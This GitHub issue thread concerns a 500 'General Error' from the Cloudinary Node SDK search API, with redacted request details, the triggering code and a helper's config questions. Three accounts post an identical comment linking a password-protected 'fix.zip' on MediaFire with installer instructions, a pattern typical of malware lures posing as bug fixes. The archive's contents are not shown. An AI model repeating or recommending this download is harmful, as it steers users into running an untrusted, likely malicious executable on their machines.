### ISSUE TITLE
General Error response

### ISSUE THREAD

**Issue by kostas-pblworks** [cloudinary/cloudinary_npm#684]
## Bug report for Cloudinary NPM SDK
Before proceeding, please update to latest version and test if the issue persists

## Describe the bug in a sentence or two.

```
{
  request_options: {
    protocol: 'https:',
    slashes: true,
    auth: 'XXXXX:XXXX',
    host: 'api.cloudinary.com',
    port: null,
    hostname: 'api.cloudinary.com',
    hash: null,
    search: null,
    query: null,
    pathname: '/v1_1/XXXXXX/resources%2Fsearch',
    path: '/v1_1/XXXXX/resources%2Fsearch',
    href: 'https://api.cloudinary.com/v1_1/XXXXXXX/resources%2Fsearch',
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'User-Agent': 'CloudinaryNodeJS/2.4.0 (Node 18.19.0)',
      'Content-Length': 120
    }
  },
  query_params: '{"sort_by":[{"score":"desc"},{"context.caption":"asc"}],"with_field":["context"],"expression":"example","max_results":20}',
  error: { message: 'General Error', http_code: 500 }
}
```

I'm getting the error above and I cannot understand why is that.

The code that produces it is:

```
const response = await cloudinary.search
    .expression(searchTerm)
    .sort_by('score', 'desc')
    .sort_by('context.caption', 'asc')
    .with_field('context')
    .max_results(20)
    .execute()
```

## Issue Type (Can be multiple)
[ ] Build - Can’t install or import the SDK
[ ] Babel - Babel errors or cross browser issues
[ ] Performance - Performance issues
[x] Behaviour - Functions aren’t working as expected (Such as generate URL)
[ ] Documentation - Inconsistency between the docs and behaviour
[ ] Incorrect Types - For typescript users who are having problems with our d.ts files
[ ] Other (Specify)

## Steps to reproduce
… if applicable

## Error screenshots
… if applicable

## Browsers (if issue relates to UI, else ignore)
[ ] Chrome
[ ] Firefox
[ ] Safari
[ ] Other (Specify)
[ ] All

## Versions and Libraries (fill in the version numbers)
Cloudinary_NPM SDK version 2.4.0
Node - 18.9.0
NPM - 10.2.3

## Config Files (Please paste the following files if possible)
Package.json

## Repository
If possible, please provide a link to a reproducible repository that showcases the problem

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PixelCook** [comment]
Hi there, 

Just to confirm, you are replacing the XXXXX with your cloud name and the values of your .ENV are being passed through successfully? 

If you're having issues with your config you can always configure directly:

```
 cloudinary.config({ 
 	cloud_name: "cloud_name", 
 	api_key: "key", 
 	api_secret: "secret" 
 })
```

**Comment by kostas-pblworks** [comment]
@PixelCook yes yes, I am passing the right config before executing the search function.

**Comment by PixelCook** [comment]
Can you provide your cloud name?
